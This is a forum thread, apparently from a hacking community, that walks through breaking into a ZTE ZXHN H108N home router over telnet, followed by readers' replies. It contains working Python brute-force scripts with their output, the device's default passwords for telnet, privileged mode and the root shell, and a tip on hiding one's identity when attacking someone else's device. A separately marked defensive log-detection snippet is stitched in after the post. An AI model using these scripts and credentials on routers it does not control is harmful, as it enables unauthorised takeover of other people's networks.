







Hacking ZTE router (ZXHN H108N)
Hacking ZTE router (ZXHN H108N) #1
Hello


I did this for fun only... nothing really special, this is just a story (a true one)



Setup

OK, I have a ZTE router, a ZXHN H108N, that I am connected to using the wlan0 interface (wireless); the gateway is 192.168.1.1, and the goal is to gain access to the shell!

I am (recently only) running Mint 16, not Kali, not BT5 and of course not Mickey Mouse (Windows)!

Reconnaissance and Footprinting
Note: as this is my router I didn't have to worry about hiding (going anonymous) by changing the MAC address and so on... but I would recommend doing so if you are pentesting/hacking someone!

So first thing to do is to scan the ports and OS banner (to determine the OS) and so on! For that I used nmap:

Code:
nmap -F 192.168.1.1 -O

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-20 00:03 EEST
Nmap scan report for 192.168.1.1 (192.168.1.1)
Host is up (0.0035s latency).
Not shown: 97 closed ports
PORT    STATE SERVICE
23/tcp  open  telnet
80/tcp  open  http
443/tcp open  https
MAC Address: 54:22:F8:16:67:1F (zte)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds

I used a fast scan (-F option) for no reason really; I could do a full TCP scan or even include UDP... but I would like to keep things... simple!

So as you can see the OS is Linux 2.6.9-30 and there are three ports open... and holy crap, this router is running Telnet!!! This should be fun (and it was!)

Gaining Access
So the next thing is to try and connect to the router via Telnet, so I did the following:
Code:
ligeti-Studio-1558 ~ # telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

      ************************************************************
                          Welcome to the world of CLI !
      ************************************************************
Username:

Hmmm... I need the user name and password to access the CLI (Command Line Interface)! Well... tbh I just tried a couple of random usernames (I had 3 chances before the connection was lost); the first one was "admin" and it returned "% Bad username!", but then I thought to myself: "If I want to access the shell as root... the username should be root, right? duh!!!", so I entered "root" and it was correct, but for the password I tried a couple of known passwords such as {toor, root, admin, admin123, ...} and none worked (I failed)! I could go on for hours/days/weeks... but I want to access the shell and I want it NOW!!!

The Attack 0x00

So, what do I have so far?
  • IP address
  • Telnet access (opened)
  • CLI
  • Username

I need the password!

Well... for no reason I decided to write my own tool to crack the password using a dictionary attack. I was lucky, because I used a very small wordlist (1275 words only); the wordlist (or dictionary) is made of the most commonly used passwords. I don't remember where I got this list from, but it is not important really!

My code:
Code:
#ZTE_Hacking
# execfile('/home/ligeti/Scripts/ZTE_Script.py')
import telnetlib
import time
from sys import stdout

wordlist = '/home/ligeti/wordlists/wordlist.txt'
# Load the wordlist file
with open(wordlist, 'r+') as f:
    # Read the file
    lines = f.readlines()
    # Telnet
    connection = telnetlib.Telnet()
    # Testing
    for password in lines:
        try:
            print '\r' + '\t' + time.ctime(time.time())  + '\t' + password.strip('\r\n'),
            stdout.flush()
            # Connect to the router (Telnet)
            connection.open('192.168.1.1')
            # Read until the server/Router asks for username
            chk = connection.read_until("Username:")
            # Send the username (root)
            connection.write("root\n")
            # Read until the server/Router asks for password!
            chk = connection.read_until('Password:')
            #send the password that we are currently testing
            connection.write(password)
            # this is important, I actually don't know
            # how to check if this password is correct
            # but I know that it will keep asking for the password in case if it is not!
            # So I will check for the "Password:" string and if I get a delay
            # for 1 second then this could mean that this is the correct password!
            chk = connection.read_until('Password:', 5)
            # Extra check: checking that the router didn't respond with "% Bad username!"
            if ('Bad' not in chk):
                connection.close()
                print "\nHacked: " + password
                break
            connection.close()
        except Exception, e:
            print 'Error (' + password.strip('\r\n') + '): ' + str(e)

Note: the script is dirty, and I don't care, all I want is the password! If you are irritated by my script please feel free to post a better one, but please do it quietly; the script is not the main topic for this thread! Or for any of my threads... ever! I am asking this with all my respect of course.

So here is the output (took a while to finish):
Code:
>>> execfile('/home/ligeti/Scripts/ZTE_Script.py')
    Tue Jun 24 23:17:13 2014    888888 Error (888888): telnet connection closed
    Tue Jun 24 23:17:46 2014    angela1 Error (angela1): telnet connection closed
    .
    .
    .        
    Tue Jun 24 23:31:46 2014    parrot Error (parrot): telnet connection closed
    Tue Jun 24 23:32:10 2014    public  
Hacked: public

Bingo! The password is "public", time to test:

Code:
ligeti-Studio-1558 ~ # telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

          ************************************************************
                          Welcome to the world of CLI !
          ************************************************************
Username:root
Password:
CLI>?
Exec commands:
  enable  Turn on privileged commands.
  exit    Quit from telnet.
  ping    Ping the destination.
CLI>enable
Password:

Explanation:
  • I connect to 192.168.1.1:23 (telnet).
  • I enter the user name and password (root/public).
  • I see CLI> prompt (similar to Cisco routers) so I try '?' for help.
  • I see the enable command, which switches the CLI to config mode.

The Attack 0x01

And now I need the password to enable the config mode. I tested some passwords manually, and I guessed it successfully after a few attempts, BUT... let's try to brute-force the damn thing

The password is alphanumeric, so my charset will be:
Code:
>>> string.ascii_letters + string.digits
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'

So I need code to test all the combinations of these letters... crazy eh? because the total number of tries for only a three character password would be:
Code:
>>> pow(len(string.ascii_letters + string.digits), 3)
238328

And for 8 characters:
Code:
>>> pow(len(string.ascii_letters + string.digits), 8)
218340105584896L

I have no time for this... so I will show you a simple script (just for fun) that will check only 3 character long passwords (and only with the string.lowercase charset)

Code:
#ZTE_Enable
# execfile('/home/ligeti/Scripts/ZTE_Enable.py')
import telnetlib
import time
from sys import stdout
import itertools
import string

password = []
connection = telnetlib.Telnet()
print "Connecting to router"
connection.open('192.168.1.1')

print "Connecting to CLI"
chk = connection.read_until('Username:')
connection.write('root\n')
chk = connection.read_until('Password:')
connection.write('public\n')

chk = connection.read_until('CLI>')

print "Generating wordlist"
wordlist = itertools.product(string.lowercase, repeat=3)
for word in wordlist:
    password.append(''.join(word))
print "Attacking..."
index = 0
while (index < len(password)):
    connection.write('enable\n')
    chk = connection.read_until('Password:')
    for i in range(0, 3):
        print '\r' + str(index) + '\t' + time.ctime(time.time())  + '\t' + password[index],
        stdout.flush()
        connection.write(password[index] + '\n')
        chk = connection.read_until('Password:', 1)
        index += 1
    if ('Bad' not in chk):
        print "\nHacked: " + password[index-1]
        break

Output (took 4+ hours to finish):
Code:
>>> execfile('/home/ligeti/Scripts/ZTE_Enable.py')
Connecting to router
Connecting to CLI
Generating wordlist
Attacking...
17398    Wed Jun 25 00:59:00 2014    zte
Hacked: zte

Yes it was 'zte', something I did guess by myself, and with this information I could actually access the config mode:

Code:
CLI>enable
Password:
CLI#?
Exec commands:
  allgreenledon   set all green led on
  allledoff       set all led off
  allledon        set all led on
  configure       Enter configuration mode.
  disable         Exit from privilege mode.
  exit            Quit from telnet.
  macaddr         show or set mac address
  ping            Ping the destination.
  reboot          Reboot device.
  reset           reset device
  restoredefault  Reset to factory configuration.
  serialnumber    get or set SN
  swversion       show software version
CLI#shell
ZXHN H108N
Login: root
Password:
Password is incorrect
Password:
Password is incorrect
Password:

BusyBox v1.01 (2013.07.10-08:47+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

#

I don't want to make this thread any longer, I know that the subject is boring, but... I had to share (for a very good reason)

So the username and the password for the shell are root:root (easy eh?)

Conclusion
If your router is using Telnet... get another one! If it does use SSH, check the version and security! Be very careful with these issues; a misconfigured network device can be the worst nightmare one can have if a hacker finds out about it! So always check and double check your network configuration and the devices you use!

Thank you and please leave your comment[s] or question[s]

[note] If you are interested in this topic please check my other thread: http://www.hackcommunity.com/Thread-Haki...-TL-WR740N
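Seen from the router's side, the dictionary attack in this post is a long run of short telnet sessions from one host: the router drops the session after three wrong passwords, and the attempts in the output above are roughly half a minute apart. This added detection example is not part of the original post; it flags such sources from constructed connection-log lines whose format (a kernel-style "NEW src= dst= dpt=" record per TCP session) is an assumption.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log (not from the original post); one line per new TCP
# session seen by the gateway. 192.168.1.7 opens telnet sessions every ~33 s.
SAMPLE_LOG = """\
Jun 24 23:17:13 gw kernel: NEW src=192.168.1.7 dst=192.168.1.1 proto=TCP dpt=23
Jun 24 23:17:46 gw kernel: NEW src=192.168.1.7 dst=192.168.1.1 proto=TCP dpt=23
Jun 24 23:18:19 gw kernel: NEW src=192.168.1.7 dst=192.168.1.1 proto=TCP dpt=23
Jun 24 23:18:52 gw kernel: NEW src=192.168.1.7 dst=192.168.1.1 proto=TCP dpt=23
Jun 24 23:19:25 gw kernel: NEW src=192.168.1.7 dst=192.168.1.1 proto=TCP dpt=23
Jun 24 23:19:40 gw kernel: NEW src=192.168.1.12 dst=192.168.1.1 proto=TCP dpt=80
Jun 24 23:20:01 gw kernel: NEW src=192.168.1.12 dst=192.168.1.1 proto=TCP dpt=23
"""

# Assumed line layout: "<Mon dd HH:MM:SS> <host> <proc:> NEW src=.. dst=.. proto=TCP dpt=.."
LINE_RE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ \S+ NEW src=(\S+) dst=\S+ proto=TCP dpt=(\d+)"
)


def parse(line, year=2014):
    """Return (timestamp, src_ip, dst_port) or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return ts, m.group(2), int(m.group(3))


def telnet_bruteforce_sources(log_text, window_s=300, threshold=5):
    """Map src_ip -> peak number of telnet (dpt=23) sessions it opened inside
    any sliding window of window_s seconds, for sources reaching threshold.
    A legitimate admin opens one session; a guessing loop opens dozens."""
    recent = defaultdict(deque)   # src_ip -> timestamps inside the window
    flagged = {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None or rec[2] != 23:
            continue                # ignore unparsable lines and non-telnet ports
        ts, src, _ = rec
        q = recent[src]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()             # expire sessions older than the window
        if len(q) >= threshold:
            flagged[src] = max(flagged.get(src, 0), len(q))
    return flagged
```

With the sample above, 192.168.1.7 is reported with five telnet sessions inside five minutes while 192.168.1.12 (one telnet and one HTTP session) is not.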

RE: Hacking ZTE router (ZXHN H108N) #2
Another interesting read, I'm sure I have an old telnet enabled router laying around somewhere.

To the attic!

Also, why are you raging on routers so hard lately lol

RE: Hacking ZTE router (ZXHN H108N) #3
(06-25-2014, 12:03 AM)chmod Wrote: Another interesting read, I'm sure I have an old telnet enabled router laying around somewhere.

To the attic!

Almost all Cisco and ZTE routers have Telnet enabled on them by default (nowadays)

Quote:Also why you raging on routers so hard lately lol

Well... we don't have enough/(or at all) tutorials to cover this area I guess!

Plus, this is a VERY important subject... yet it is sort of ignored! Just imagine what it means if you can access the configuration of the firewall in the router, or build a VPN and access the network remotely, or even worse... implement a MiTM attack (somehow)!?

Anyway, I think this is the last tutorial about routers, I know the subject is boring, people nowadays are more interested in the application layer than networks and network devices (and tbh I don't blame them)

Thanks

RE: Hacking ZTE router (ZXHN H108N) #4
If a router is powered by DD-WRT firmware, it definitely has telnet open, then I think I can use this to access the router, right?

RE: Hacking ZTE router (ZXHN H108N) #5
This router is running BusyBox v1.01...

Telnet is not a vulnerability (as you may already know) but a good attack vector ... the vulnerability is the default username/password! Which can't (yes it can NOT) be avoided easily, Kaminsky talked about this issue in this interview (recommended to watch)



The access is not a problem... it is what you can do after that (with 64kb memory and about 16kb for storage)...

What I hacked so far was iptables and dnsmasq (a simple DNS and DHCP server)... I did check also httpd (apache) and minihttp on other routers.

The problem is... lots of people are using these routers! So you can actually go into any coffee shop, company, airport, store, restaurant... etc. and find these routers (from ZTE, TP-Link and BandLuxe). ISP companies know about this issue and they are ignoring it (totally, royally and intentionally)... Do you know how crazy this is? I think that the whole country is vulnerable!!!

I downloaded the source code for both DD-WRT and OpenWRT to test... it will take me a while though to finish my testing, so if you find anything on your part please let me know and I will gratefully appreciate it

Thanks

RE: Hacking ZTE router (ZXHN H108N) #6
great tutorial and explanation, thank you for contributing.

Regards, iCode_()!!!

RE: Hacking ZTE router (ZXHN H108N) #7
(07-01-2014, 06:33 PM)iCode_() Wrote: great tutorial and explanation, thank you for contributing.

Thanks, glad you liked it!

@Snipa/@chmod guys this is also about routers, maybe we should move it to "Data networks" section as well? Although the subject is still about hacking!

Thanks

RE: Hacking ZTE router (ZXHN H108N) #8
(07-05-2014, 01:47 PM)Ligeti Wrote:
(07-01-2014, 06:33 PM)iCode_() Wrote: great tutorial and explanation, thank you for contributing.

Thanks, glad you liked it!

@Snipa/@chmod guys this is also about routers, maybe we should move it to "Data networks" section as well? Although the subject is still about hacking!

Thanks

Good point, moved.

RE: Hacking ZTE router (ZXHN H108N) #9
(07-05-2014, 02:06 PM)chmod Wrote:
(07-05-2014, 01:47 PM)Ligeti Wrote:
(07-01-2014, 06:33 PM)iCode_() Wrote: great tutorial and explanation, thank you for contributing.

Thanks, glad you liked it!

@Snipa/@chmod guys this is also about routers, maybe we should move it to "Data networks" section as well? Although the subject is still about hacking!

Thanks

Good point, moved.

Thanks mate, and sorry about this confusion, I will try to be more careful next time

Thanks again

RE: Hacking ZTE router (ZXHN H108N) #10
(07-05-2014, 03:40 PM)Ligeti Wrote:
(07-05-2014, 02:06 PM)chmod Wrote:
(07-05-2014, 01:47 PM)Ligeti Wrote:
(07-01-2014, 06:33 PM)iCode_() Wrote: great tutorial and explanation, thank you for contributing.

Thanks, glad you liked it!

@Snipa/@chmod guys this is also about routers, maybe we should move it to "Data networks" section as well? Although the subject is still about hacking!

Thanks

Good point, moved.

Thanks mate, and sorry about this confusion, I will try to be more careful next time Smile

Thanks again

It happens, I know you don't do it intentionally.